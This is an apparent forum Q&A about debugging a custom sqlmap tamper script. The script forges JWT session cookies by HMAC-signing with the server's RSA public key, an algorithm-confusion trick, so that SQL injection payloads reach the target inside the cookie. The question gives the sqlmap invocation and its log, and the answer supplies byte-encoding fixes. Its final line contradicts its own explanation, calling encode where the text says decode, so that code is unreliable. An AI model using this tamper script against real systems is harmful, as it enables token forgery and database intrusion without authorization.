Custom sqlmap tamper script giving error: `bytes-like object is required, not 'str'`

Question

I'm trying to write a tamper script for sqlmap to wrap my payload in a JSON Web Token (JWT) and send it in a session cookie. However, when I try to run my tamper script in sqlmap via:

sqlmap -u "http://example.com/" --cookie="session=*" --tamper="plain2jwt.py" -v 3

I get the following error/output:

[10:37:13] [DEBUG] cleaning up configuration parameters
[10:37:13] [INFO] loading tamper module 'plain2jwt'
[10:37:13] [DEBUG] setting the HTTP timeout
[10:37:13] [DEBUG] setting the HTTP Cookie header
[10:37:13] [DEBUG] setting the HTTP User-Agent header
[10:37:13] [DEBUG] creating HTTP requests opener object
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[10:37:20] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [DEBUG] resolving hostname 'example.com'
[10:37:20] [INFO] testing connection to the target URL
[10:37:21] [DEBUG] declared web page charset 'utf-8'
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[10:37:21] [INFO] testing if the target URL content is stable
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [INFO] target URL content is stable
[10:37:21] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
[10:37:21] [CRITICAL] error occurred while running tamper function 'plain2jwt' ('TypeError: a bytes-like object is required, not 'str'')
[10:37:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times

I am not sure what is causing this error for when I run the script standalone I get no error and the other tamper scripts seem to be returning a string not a bytes-like object. I even tried encoding my output but that didn't seem to help. My tamper script is as follows:

#!/usr/bin/env python

import hmac
import hashlib
import base64
import json
import imp
enums = imp.load_source("lib.core.enums", "/usr/share/sqlmap/lib/core/enums.py")

__priority__ = enums.PRIORITY.NORMAL

def tamper(payload, **kwargs):
    '''
    '''
    header = {
            "alg":"HS256",
            "typ":"JWT"
    }
    payload = {
            "username":payload,
            "pk":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n",
            "iat":"1583764126"
    }

    key = "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n"
    unsigned_token = base64.b64encode(json.dumps(header)).strip('=') + '.' + base64.b64encode(json.dumps(payload)).strip('=')
    signature = hmac.new(key, unsigned_token, hashlib.sha256)
    token = unsigned_token + '.' + base64.b64encode(signature.hexdigest()).strip('=')
    return token if payload else payload

Any idea what might be causing this? Thanks!

Answer 1

base64.b64encode takes a bytes-like object as argument. So you have to encode your string first. Same goes for hmac.new .

So you can do for example:

unsigned_token = base64.b64encode(json.dumps(header).encode('utf-8')).strip(b'=') + b'.' + base64.b64encode(json.dumps(payload).encode('utf-8')).strip(b'=')
signature = hmac.new(key.encode('utf-8'), unsigned_token, hashlib.sha256)
token = unsigned_token + b'.' + base64.b64encode(signature.hexdigest().encode('utf-8')).strip(b'=')

Then, as OP pointed out, tamper needs to return a string, so you'll eventually have to decode-back bytes to str with for example:

return token.encode('utf-8')